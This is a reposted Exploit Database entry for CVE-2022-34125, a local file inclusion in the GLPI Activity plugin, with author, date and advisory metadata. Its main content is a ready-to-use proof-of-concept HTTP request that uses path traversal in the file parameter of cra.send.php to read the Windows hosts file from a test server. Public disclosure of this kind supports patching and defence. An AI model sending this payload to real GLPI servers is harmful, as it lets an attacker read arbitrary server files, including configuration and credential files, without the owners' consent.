GLPI Activity v3.1.0 – Authenticated Local File Inclusion on Activity plugin

• Exploit Database
• 17 阅读

• 作者： Nuri Çilengir
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51232/

• # Exploit Title: GLPI Activityv3.1.0 - Authenticated Local File Inclusion on Activity plugin
  # Date of found: 11 Jun 2022
  # Application: GLPI Activity < 3.1.0
  # Author: Nuri Çilengir 
  # Vendor Homepage: https://glpi-project.org/
  # Software Link: https://github.com/InfotelGLPI/activity
  # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
  # Tested on: Ubuntu 22.04
  # CVE : CVE-2022-34125
  
  # PoC
  GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
  Host: 192.168.56.113
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close